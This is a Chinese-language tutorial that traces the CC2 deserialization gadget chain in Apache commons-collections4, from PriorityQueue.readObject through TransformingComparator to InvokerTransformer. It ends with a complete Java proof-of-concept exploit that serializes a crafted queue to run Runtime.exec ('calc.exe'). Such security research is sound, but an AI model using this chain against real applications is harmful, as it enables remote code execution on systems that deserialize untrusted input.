目錄

關于commons-collections4

一個重要的思維模型

觸發Transform的關鍵類：TransformingComparator

反序列化的入口：PriorityQueue

Exp

---

關于commons-collections4

commons-collections4 是 Apache Commons 組件庫中的一個項目，它是對舊版本 commons-collections 的重構和升級。主要的區別包括：

1. API 設計：commons-collections4 重新設計了 API，并且引入了一些新的功能和改進，同時也修復了一些舊版本中存在的 bug。

2. 性能優化：commons-collections4 進行了性能優化，使得在實際使用中更加高效。

3. 安全性增強：commons-collections4 引入了更多的安全性措施，以防止常見的安全漏洞。

commons-collections4有了兩條新的利用鏈，CC2和CC4，這篇文章簡單聊聊CC2

一個重要的思維模型

CC鏈是一條Serializable#readObject()到Transformer#transform()的調用鏈

觸發Transform的關鍵類：TransformingComparator

看其compare方法就可，簡單粗暴直接調用transform

public int compare(I obj1, I obj2) {O value1 = this.transformer.transform(obj1);O value2 = this.transformer.transform(obj2);return this.decorated.compare(value1, value2);}

現在我們的任務就是怎么去調用TransformingComparator的compare方法

反序列化的入口：PriorityQueue

先看PriorityQueue的構造方法，要求傳入一個int和一個Comparator

 public PriorityQueue(int initialCapacity,Comparator<? super E> comparator) {// Note: This restriction of at least one is not actually needed,// but continues for 1.5 compatibilityif (initialCapacity < 1)throw new IllegalArgumentException();this.queue = new Object[initialCapacity];this.comparator = comparator;}

再來看PriorityQueue的readObject方法

private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {// Read in size, and any hidden stuffs.defaultReadObject();// Read in (and discard) array lengths.readInt();SharedSecrets.getJavaObjectInputStreamAccess().checkArray(s, Object[].class, size);final Object[] es = queue = new Object[Math.max(size, 1)];// Read in all elements.for (int i = 0, n = size; i < n; i++)es[i] = s.readObject();// Elements are guaranteed to be in "proper order", but the// spec has never explained what that might be.heapify();}

最后調用了heapify方法

顯然由構造方法傳入的comparator不為null，heapify方法進了else分支調用siftDownUsingComparator

 private void heapify() {final Object[] es = queue;int n = size, i = (n >>> 1) - 1;final Comparator<? super E> cmp;if ((cmp = comparator) == null)for (; i >= 0; i--)siftDownComparable(i, (E) es[i], es, n);elsefor (; i >= 0; i--)siftDownUsingComparator(i, (E) es[i], es, n, cmp);}

而siftDownUsingComparator內部會調用構造方法傳入的comparator的compare方法，此時我們只要令comparator為TransformingComparator即可完成利用鏈的調用。

 private static <T> void siftDownUsingComparator(int k, T x, Object[] es, int n, Comparator<? super T> cmp) {// assert n > 0;int half = n >>> 1;while (k < half) {int child = (k << 1) + 1;Object c = es[child];int right = child + 1;if (right < n && cmp.compare((T) c, (T) es[right]) > 0)c = es[child = right];if (cmp.compare(x, (T) c) <= 0)break;es[k] = c;k = child;}es[k] = x;}

Exp

package com.CC2;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;public class CC2 {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {Transformer[] fakeTransformers = new Transformer[] {newConstantTransformer(1)};Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] { null, new Object[0] }),new InvokerTransformer("exec", new Class[] { String.class}, new String[] { "calc.exe" }),};Transformer transformerChain = new ChainedTransformer(fakeTransformers);Comparator comparator = new TransformingComparator(transformerChain);PriorityQueue queue = new PriorityQueue(2, comparator);queue.add(1);queue.add(2);setFieldValue(transformerChain, "iTransformers", transformers);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(queue);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}
}